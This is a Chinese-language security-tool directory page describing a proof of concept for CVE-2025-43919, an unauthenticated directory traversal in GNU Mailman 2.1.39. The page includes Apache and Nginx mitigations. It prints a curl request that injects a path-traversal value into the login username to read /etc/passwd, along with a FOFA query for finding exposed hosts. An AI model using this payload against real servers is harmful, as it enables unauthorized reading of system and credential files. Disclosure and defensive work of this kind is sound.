Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-43919-POC — 在 GNU Mailman 2.1.39(随 cPanel/WHM 捆绑发布)中发现了一个新漏洞,该漏洞允许未经身份验证的远程攻击者通过目录遍历缺陷读取服务器上的任意文件。 | Kitploit
工具/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

在 GNU Mailman 2.1.39(随 cPanel/WHM 捆绑发布)中发现了一个新漏洞,该漏洞允许未经身份验证的远程攻击者通过目录遍历缺陷读取服务器上的任意文件。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1111年前尚未审核

🚨 CVE-2025-43919:GNU Mailman 2.1.39 中的目录遍历漏洞(cPanel/WHM)

在随 cPanel/WHM 捆绑发布的 GNU Mailman 2.1.39 中发现了一个新漏洞,允许未经身份验证的远程攻击者通过目录遍历缺陷读取服务器上的任意文件。

📌 漏洞摘要:

  • 类型:目录遍历(未认证)
  • 组件:private.py CGI 脚本
  • 受影响端点:/mailman/private/mailman
  • 影响:泄露 /etc/passwd、.mbox 存档和 Mailman 配置文件等文件
  • CVSS 评分:5.8(中危)
  • CVE ID:CVE-2025-43919

状态:尚无官方补丁(Mailman 2.1.x 已停止维护)

🔥 概念验证:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 利用场景:

  • 转储 /etc/passwd、配置文件或邮箱文件
  • 泄露凭据和敏感存档
  • 与其他漏洞链式利用以实现 RCE 或权限提升

🛡️ 缓解措施: 在 Web 服务器层面阻止对 /mailman/private 的访问:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

或在 Nginx 中:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ 迁移到 Mailman 3.x —— 2.x 已停止维护,且缺乏现代防护

🔍 FOFA 查询:app="Mailman"

📚 了解更多,负责任地分享,并确保你的基础设施安全。

🔒 关注以获取更多真实世界的 CVE、PoC 和加固技巧: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

下载工具